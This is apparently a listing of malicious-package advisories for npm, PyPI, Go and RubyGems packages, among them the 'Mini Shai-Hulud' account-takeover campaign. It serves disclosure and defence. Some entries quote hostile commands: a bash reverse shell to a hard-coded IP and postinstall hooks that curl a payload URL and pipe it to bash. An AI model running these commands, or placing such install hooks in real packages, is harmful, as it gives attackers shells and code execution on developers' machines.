Malicious code in @antv/graphlib (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/interaction (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/l7-district (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/l7-utils (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/larkmap (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/layout-gpu (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/li-editor (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/li-sdk (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/matrix-util (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/mcp-server-chart (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/s2-ssr (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/x6-plugin-scroller (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/xflow (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in mcp-echarts (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in onfire.js (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/semantic-release-pnpm (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/g-dom-mutation-observer-api (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/g-mobile-canvas (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @zentrafinance/protocol-config (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dac3a1aa20b56dc05bd68918bf7f6148970c361a102fafcd7d75d807adc36862 The package @zentrafinance/protocol-config was found to contain malicious code. Source: ghsa-malware...

Malicious code in dowload_ebok_stalking_jack_the_ripper_by_kerri_maniscalco_james_patterson_b529t (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1486e8a5f17dfc7a56252ff489f714a2ab7a0befd20da59b43d93d31f8587149 The package dowloadebokstalkingjacktheripperbykerrimaniscalcojamespattersonb529t was found to contain malicious code. Source: ghsa-malware...

Malicious code in sol-batch-transfer-sdk (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 dab4fb850a1ce0b83f1e7f74ce0281ca8309031037355f9a247dbd0a715eab4d The code silently adds a hardcoded address to the list of transfer recipients. --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

Malicious code in prisma-callback (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1aab2820bfb9036995418ba2b36887f8970d7deaa69d8bc4aa24e36266bf18d1 [email protected] is a name-confusion package against the genuine prisma ORM. Its package.json declares "preinstall":...

Malicious code in cache-poisoning-pwn-demo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dacd21af4f62dd3183bfc4126d1cbcf18600a1c72301b7ae8ca401ec7e44f94e The package's postinstall hook node -e "try require'./dist/postinstall.js'; catche " loads dist/postinstall.js, which bundles a poisoned is-number...

Malicious code in ts-build-optimize (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 51c637ab7c13ca2f592502f3444ebb24b291422b6388563d04fb8f7ae9030d5a The package masquerades as a TypeScript helper library README is lifted from Microsoft's tslib and references --importHelpers, extends, assign, and a...

Malicious code in cheerio-tool (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2d51a2885f4eaff732d1ef7ab065b04d21c59263b1212d5b92b92c87914ef879 cheerio-tool typosquats the popular cheerio HTML parser README claims 'Cheerio Tool utility helpers', keywords are 'lodash','utilities', and index.js...

Malicious code in natazx (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d0514a0df660dfc4e7380f68e8533fa325ccc246ba21855975f73d3af78cd9f0 On import natazx, the package's top-level code executes several installer-hostile actions without consent: 1 it unconditionally overwrites the host's...

Malicious code in marginfi-client-v2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6239cecf8f2a6600aa98aeec2042d29928f02416181a88f31a251b0448327fc1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in sol-coverage (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d6ac3d8c51b3f87a97b7b9724145b73d894fc4027da14122aea3eb6d51bfb671 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in mrgn-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 16fe2927853a543269a7eb66273bfea477dd040bc2e90f40d9b3642e9d138f5d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in foundry-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 650bf2f76e5aa2fc3b175c4b582ce3c3ee8b9ac6fe433ed925f6e521c619c60b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in ethers-wordlist (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 94ac365a81e582fce9faa13839220134e640d8ec505179e55e7aa636a324205c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in ethers-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7b57e9cfd1db5527382181f22fbf36f8bbc8cc0df4f701d2b4d6bc7ec7dbc407 The OpenSSF Package Analysis project identified 'ethers-web' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in ethers-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 8f43ab2ac9caeed4f5dd0895f4da7d3a646038768f5d0024f443bb527fd1ad95 The OpenSSF Package Analysis project identified 'ethers-logger' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in syntaxlogger (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ebc8a65895fc09c10b6e6bf23926076ec575582e80e084616e6779b091df947d When using the provided functionality, code silently downloads archives with executables to a location excluded from A scanning, and then executes them. The...

Malicious code in py-requests (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 2bd2bd26870d2cf5df73c69bca7ed9088604eccf44727e4c59f0301cc8ccd35a Package installs persistent malware acting as Rat, with the focus of stealing data and modifying copied cryptowallet addresses. --- Category: MALICIOUS - The...

Malicious code in @puppeteer/browsers (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 76482d9b1a887d0692b8dd6aab8071a8d96388a065c1e512999107e4c4e9cd54 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

Malicious code in hardhat-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis b72f90917aaff5b42d639bff4d28227b0cd2105ce4d2b109577a76b9d7003ecc The OpenSSF Package Analysis project identified 'hardhat-common' @ 2.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in ethers-io (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14 The package's package.json declares a postinstall script that base64-decodes a hidden URL http://8.217.75.147:3000/payload and pipes the HTTP respons...

Malicious code in solc-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03 package.json's postinstall lifecycle script runs node -e to base64-decode a hidden URL and pipe its contents to bash: curl -s...

Malicious code in ethers-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9a7b953533124edcc31e4293ed6bffe010e9110d795f812ba432de8b81d4d558 package.json declares a postinstall hook that base64-decodes the URL http://8.217.75.147:3000/payload, fetches it via curl over plain HTTP, and pipes...

Malicious code in truffle-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27652f23529349a6999e9121bc9714a5e9b5d11b227729c3c24147e5d2260eee package.json line 7 invokes require'childprocess' and execSync'curl...' from an npm lifecycle script. This causes the installer's machine to fetch an...

Malicious code in web3-common (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 2e42f568897d9af194eb75275059455c99b369456b0c8e0ffe13e7f32be839e6 The OpenSSF Package Analysis project identified 'web3-common' @ 1.0.0 npm as malicious. It is considered malicious because: - The package execut...

Malicious code in github.com/BufferZoneCorp/go-weather-sdk (Go)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a4e4f74e90479d472a307d311d48214827e21cf93ecf9b0b62ff2cb72adb2c9e This package is a malicious packages part of the Go BufferZoneCorp and RubyGems knot-theory clusters. The packages in this cluster steal...

Malicious code in knot-rspec-formatter-json (RubyGems)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a4e4f74e90479d472a307d311d48214827e21cf93ecf9b0b62ff2cb72adb2c9e This package is a malicious packages part of the Go BufferZoneCorp and RubyGems knot-theory clusters. The packages in this cluster steal...

Malicious code in github.com/BufferZoneCorp/go-stdlog (Go)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a4e4f74e90479d472a307d311d48214827e21cf93ecf9b0b62ff2cb72adb2c9e This package is a malicious packages part of the Go BufferZoneCorp and RubyGems knot-theory clusters. The packages in this cluster steal...

Malicious code in amino-fix (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44 The asyncfix subpackage's signature helper in aminofix/asyncfix/lib/util/helpers.py lines 22-25 does not compute the NDC-MSG-SIG locally. Instead,...

Malicious code in afk-react-intl (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 807b3bc717a7c8f60ecb69d7653fd0942431e9e6adf27cb34e2f68b4bae06cec The OpenSSF Package Analysis project identified 'afk-react-intl' @ 99.99.99 npm as malicious. It is considered malicious because: - The package...

Malicious code in aoflcorp (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis bfc014b9e60bb1abb58d948abcf31112dd4c160ab8416317476f3c67c2e84d49 The OpenSSF Package Analysis project identified 'aoflcorp' @ 0.0.1 npm as malicious. It is considered malicious because: - The package...

Malicious code in jwscube (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 325d4311f3dd1d82c8f9ee1ddc19a767eb69adf0a338625c8ce1e9d40062dec7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...